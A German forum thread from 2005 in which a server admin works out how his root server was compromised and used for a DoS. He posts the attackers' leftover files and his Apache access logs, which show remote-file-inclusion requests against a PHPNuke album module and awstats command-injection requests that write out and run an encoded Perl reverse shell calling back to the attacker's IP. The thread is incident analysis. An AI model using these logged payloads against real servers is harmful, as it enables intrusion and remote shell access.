mal wieder ein hack

[r00ty]

Hallo !
So heute hatts wohl mich erwischt. Ich hab anscheinenend nen DOS gefahren.
Leider bisher gar nichts in den Logs zu finden.
Was mich irretiert ist die Tatsache dass sowohl im mrtg als auch im srvreport der Traffic nicht auftaucht.
Wie kann das sein ?
Mrtg greift über snmp auf den Traffic zu, oder ? Da habe ich kein Plan.
Und Srvreport geht über /proc/net/dev
- das kann man aber nicht manipulieren ausser man hat den Kernel gepatcht, oder ?

[andreask2]

wo siehst Du denn den Traffic?

[r00ty]

1und1 hat meinen Server gesperrt und mir die Tageszusammenfassung von gestern geschickt...
ansonsten seh ich es nirgends....

[thomas80]

Hallo !
So heute hatts wohl mich erwischt. Ich hab anscheinenend nen DOS gefahren.
Leider bisher gar nichts in den Logs zu finden.
Was mich irretiert ist die Tatsache dass sowohl im mrtg als auch im srvreport der Traffic nicht auftaucht.
Wie kann das sein ?
Mrtg greift über snmp auf den Traffic zu, oder ? Da habe ich kein Plan.
Und Srvreport geht über /proc/net/dev
- das kann man aber nicht manipulieren ausser man hat den Kernel gepatcht, oder ?

Du musst auch nicht /proc/net/dev manipulieren, sondern nur das SRV-Script.

[r00ty]

hmmm ja, aber das halte ich für unwahrscheinlich denn das Tool ist nicht wirklich bekannt

[oxygen]

Hallo !
...
das kann man aber nicht manipulieren ausser man hat den Kernel gepatcht, oder ?

Kein Problem, nennt sich Rootkit.

[myname]

Lass mal ein frisches chkrootkit rüberlaufen.

[mr3dblond]

1und1 hat meinen Server gesperrt und mir die Tageszusammenfassung von gestern geschickt...
ansonsten seh ich es nirgends....

Ist das ein Root-Server? Wenn ja, woher will 1und1 wissen, ob er wirklich gehackt wurde?

Analysieren die Ihren Traffic auf DOS oder DDOS Attacken, fuer jede IP? (was ich mir nicht vorstellen kann)

Ciao Alex...

[bungeebug]

Nö, aber der der geDOSt wurde könnte es ja merken ... und dann Anzeige erstatten oder freundlicherweise nur den "Gegner" kontaktiern ...

denken, dann schreiben :)

[mr3dblond]

Nö, aber der der geDOSt wurde könnte es ja merken ... und dann Anzeige erstatten oder freundlicherweise nur den "Gegner" kontaktiern ...

denken, dann schreiben :)

Danke!

Das bedeutet also, dass der Mieter des Rootservers den Auftrag an 1und1 gegeben hat, den Server zu sperren. Hmm, der Beitrag hatte sich halt fuer mich so angehoert, dass 1und1 den Server von sich aus gesperrt hat - und das wuerde ich als engagierter Rootserver-Admin nicht so gut finden.

Ciao Alex...

[bungeebug]

Der Mieter hat nix sperren lassen ...

Es wird so gelaufen sein ...

1) Hacker hackt Rechner 1 ( den Root von Rooty )
2) Rechner 1 greift Rechner 2 an
3) Admin von Rechner 2 merkt das und sucht den Anfreifer
4) Admin von Rechner 2 findet die Ip von Rechner 1
5) Admin von Rechner 2 schriebt an 1+1, das ein rechner aus deren Netz angreift
5) 1+1 sperrt den Rechner 1.

[r00ty]

okay...
also hier hab ichs...
hab ein Rootkit draufgehabt - reingekommen sind sie über ein Board, dann haben sie nen rootexploit ausgeführt
ich häng noch ein paar Sachen hier an falls mal jemand die Boardsuche mit was ählichem bemüht...


/home/www/web9/html/modules/4nAlbum/album/.psy/

Code: Select all

config
config.h
cron.d
fuck
help
lang
log
motd
proc
psybnc
psybnc.conf
psybnc.pid
run
scripts
ssstt
ssstt.dir
ssstt.old
xh
y2kupdate

/var/tmp/httpd/

Code: Select all

0
clear.sh
floodbot.seen
ftp
httpd
j
k
mech.help
mech.levels
mech.pid
mech.session
mech.set
s
start.sh
v1
v2
x

/var/log/httpd/access.log

Code: Select all

 [08/Feb/2005:14:40:49 +0100] "GET /themes/Abild/images/bottombar.gif HTTP/1.0" 200 949 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:40:50 +0100] "GET /images/powered/nuke.gif HTTP/1.0" 200 1257 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:41:41 +0100] "GET /modules/4nalbum//public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=ls%20-alF%20/tmp HTTP/1.0" 301 356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:41:43 +0100] "GET /modules/4nAlbum//public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=ls%20-alF%20/tmp HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:42:34 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=ls%20-alF%20/tmp HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:14 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.nrjreunion.com/galerie/img/1/1.txt? HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:50 +0100] "GET /modules.php?name=4nAlbum HTTP/1.0" 200 12144 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:54 +0100] "GET /modules/4nAlbum/images/logodeu.gif HTTP/1.0" 200 9732 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:54 +0100] "GET /modules/4nAlbum/images/menu-icon-home.gif HTTP/1.0" 200 1189 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:54 +0100] "GET /modules/4nAlbum/images/menu-icon-top10.gif HTTP/1.0" 200 1244 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:55 +0100] "GET /modules/4nAlbum/images/menu-icon-submit.gif HTTP/1.0" 200 1294 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:58 +0100] "GET /modules/4nAlbum/album/kurse/gallery.gif HTTP/1.0" 200 439 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:58 +0100] "GET /modules/4nAlbum/album/schueler/gallery.gif HTTP/1.0" 200 439 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:58 +0100] "GET /modules/4nAlbum/images/newred.gif HTTP/1.0" 200 403 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:44:00 +0100] "GET /modules/4nAlbum/album/sonstige/gallery.gif HTTP/1.0" 200 439 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:44:49 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:00:01 +0100] "GET /modules/4nalbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 301 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:00:03 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:05:08 +0100] "GET /modules/4nalbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 301 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:05:23 +0100] "GET / HTTP/1.0" 200 19996 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:05:55 +0100] "GET /modules.php?name=ppm HTTP/1.0" 200 9463 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:06:11 +0100] "GET /modules.php?name=4ncalendar HTTP/1.0" 200 9463 "http://mysub.mydomain.tld/modules.php?name=ppm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

tcpdump der Pakete die ich dann Tonnenweise verschickt habe

Code: Select all

16:31:36.422224 217.160.172.64.34016 > 84.202.51.15.http: udp 15 (DF)

[r00ty]

ein netstat von mir sagt:

Code: Select all

udp        0      0 localhost.l:filenet-nch localhost.l:filenet-nch ESTABLISHED postgres   38818

sollte mir das sorgen machen ?

[yt]

Was für ein Board?

[Anonymous]

Hallo,
was wohl?

202.133.81.3 - - [08/Feb/2005:14:40:50 +0100] "GET /images/powered/nuke.gif

... PHPNuke mit 4nAlbum - latürnich, was sonst? :roll:
gruss
rootshell

[hazze]

Scheint wohl generell ein Porblem zu sein

Mich hats auch erwischt jedoch hab ich kein Nuke drauf

Habe ausserdem erfahren das es via PHP und Apache solche eingriffe per Rootkit geben kann

[andreask2]

was für "solche Eingriffe"?

[dodolin]

Habe ausserdem erfahren das es via PHP und Apache solche eingriffe per Rootkit geben kann

Rootzugriff bekommt man damit im allgemeinen nur, wenn es noch einen lokalen root exploit gibt, denn weder Apache noch PHP werden gewöhnlicherweise unter UID 0 laufen.

[r00ty]

irgendwie haben die's auf mich abgeshen - heute waren sie über awstats.pl drinnen
mir langts jetzt wirklich....

Code: Select all

62.249.182.219 - - [13/Feb/2005:02:55:03 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx23%5Cx21%5Cx2f%5Cx75%5Cx73%5Cx72%5Cx2f%
5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx70%5Cx65%5Cx72%5Cx6c%5Cx0a%5Cx75%5Cx73%5Cx65%5Cx20%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx49%
5Cx4f%5Cx3a%5Cx3a%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx50%5Cx4f%5Cx53%5Cx49%5Cx58%5Cx3b%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%
5Cx74%5Cx6f%5Cx20%5Cx3d%5Cx20%5Cx67%5Cx65%5Cx74%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx62%5Cx79%5Cx6e%5Cx61%5Cx6d%5Cx65%5Cx28%5Cx27%5Cx74%5Cx63%5Cx70%5Cx27%5Cx29%
5Cx3b%5C%22%22%20%3E/var/tmp/.vetx.95| HTTP/1.1" 200 729 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:05 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%
5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx20%5Cx41%5Cx46%5Cx5f%5Cx49%5Cx4e%5Cx45%5Cx54%5Cx2c%5Cx20%5Cx53%
5Cx4f%5Cx43%5Cx4b%5Cx5f%5Cx53%5Cx54%5Cx52%5Cx45%5Cx41%5Cx4d%5Cx2c%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx29%5Cx3b%5Cx20%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx20%
5Cx3d%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx61%5Cx64%5Cx64%5Cx72%5Cx5f%5Cx69%5Cx6e%5Cx28%5Cx33%5Cx31%5Cx30%5Cx33%5Cx32%5Cx2c%5Cx69%5Cx6e%5Cx65%5Cx74%5Cx5f%5Cx61%
5Cx74%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 730 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:06 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx6f%5Cx6e%5Cx28%5Cx22%5Cx36%5Cx32%5Cx2e%
5Cx32%5Cx34%5Cx39%5Cx2e%5Cx31%5Cx38%5Cx32%5Cx2e%5Cx32%5Cx31%5Cx39%5Cx22%5Cx20%5Cx29%5Cx29%5Cx3b%5Cx20%5Cx63%5Cx6f%5Cx6e%5Cx6e%5Cx65%5Cx63%5Cx74%5Cx28%5Cx53%
5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%
5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx30%5Cx29%5Cx3b%5Cx20%
5Cx64%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 730 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:07 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%
5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx31%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%
5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%
5Cx32%5Cx29%5Cx3b%5Cx20%5Cx65%5Cx78%5Cx65%5Cx63%5Cx20%5Cx7b%5Cx20%5Cx22%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx73%5Cx68%5Cx22%5Cx20%5Cx7d%5Cx20%5Cx22%5Cx22%5Cx3b%
5Cx0a%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 730 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:09 +0100] "GET /awstats/awstats.pl?configdir=|chmod%20755%20/var/tmp/.vetx.95| HTTP/1.1" 200 373 "-" "Mozilla/4.0 (com
patible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:13 +0100] "GET /awstats/awstats.pl?configdir=|rm%20%2Df%20/var/tmp/.vetx.95| HTTP/1.1" 200 369 "-" "Mozilla/4.0 (compa
tible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:56:51 +0100] "GET /awstats/awstats.pl?configdir=|exec%20/var/tmp/.vetx.95| HTTP/1.1" 200 368 "-" "Mozilla/4.0 (compatible
; MSIE 6.0; Windows 98)"

[Joe User]

Kleiner Trost: phpbb.com wurde ebenfalls durch den awstats-Bug gerootet.

[dodolin]

irgendwie haben die's auf mich abgeshen - heute waren sie über awstats.pl drinnen
mir langts jetzt wirklich....

Du solltest dich nicht über die Spielkinder aufregen, sondern über deine eigene Nachlässigkeit. Sowohl der AWstats Bug als auch diverse Kernel-Bugs waren ja nicht erst seit heute bekannt. Nicht immer die Schuld bei anderen suchen...

[r00ty]

ich liebe diese schlauen Belehrungen :)
Ich bin der Meinung dass ich meinen Job nicht schlecht gemacht habe. Immerhin ist er jetzt > 2 Jahre gerannt ohne größere Probleme zu machen. Und wenn ich daran denke was alles auf dem Server läuft überrascht es mich eigentlich selbst, dass es nicht schon früher Probleme gemacht hat.
Und zu den Kernel Bugs muss ich dich leider enttäuschen, zumindest hat ich den aktuellen 1und1-Kernel am laufen. Da hoffe ich doch mal dass dieser gepatcht war. Vermutlich haben sie über einen mc-root-expoilt das erste mal ihr rootkit installiert....
Und das mit awstats ist halt auch genial: ich hab das nach dem HowTo hier draufgezogen, und leider funktioniert es nicht wenn man die aktuelle Version statt der die im HowTo angegeben ist verwendet. Natürlich rechtfertigt es nicht, das alte awstats zu verwenden, aber es ist für die Leute genial, die einfach die IP-Range der 1und1 Server durchgehen da dort sicher der ein oder andere ist der das Howto hier verwendet hat. Die Supportleute haben auch gemeint dass sie >10 Server deswegen gestern vom Netz genommen haben.
Nunja, jetzt gibts eine neue Kiste bei der alles schneller, besser, schöner und sicherer wird :)

[chris76]

Und das mit awstats ist halt auch genial: ich hab das nach dem HowTo hier draufgezogen, und leider funktioniert es nicht wenn man die aktuelle Version statt der die im HowTo angegeben ist verwendet.

Und noch eine schlaue Belehrung:
Zu dem Zeitpunkt wo der awstats Bug bekanntgeworden ist hast du versucht es upzudaten aber festgestellt das es mit dem Howto hier nicht geht.
Was hat dich davon abgehalten hier nach hilfe zu suchen um rauszufinden warum es nicht geht das Update?

Vermutlich weil es ja "nur" die Statistik ist? Oder?

und sicherer wird Smile

vor allem das hoffe ich nicht für dich sondern für alle anderen Server Besitzer!

[r00ty]

Vermutlich weil es ja "nur" die Statistik ist? Oder?

da liegst du wohl richtig, ich war froh das das Teil endlich gelaufen ist.....
aber wie gesagt, man lernt draus

eine Sache die mich für meinen nächsten Server noch a weng Sorgen bereitet ist dieses:
für Boards und CMS-Systeme (und andere große bekannte Projekte) wird es immer wieder Exploits geben, um zumindest User-Rechte zu erlangen und das langt ja auch schon um andere Leute mit meinem Server zu pisaken. Und dafür sehe ich bisher nicht wirklich Möglichkeiten dies zu verhindern....

[Joe User]

Und dafür sehe ich bisher nicht wirklich Möglichkeiten dies zu verhindern....

Verhindern kann man soetwas, abgesehen vom Ausbau der NIC, nicht, aber man kann es potentiellen Crackern durchaus schwer machen. Ein paar Schlagworte wären beispielsweise: pax, grsec, rsbac, selinux, ssp, pie, acl, attr, jail, chroot, chrootuid, scp/sftp, pub-key, ssl, gpg, nodev, noexec, nosuid, ...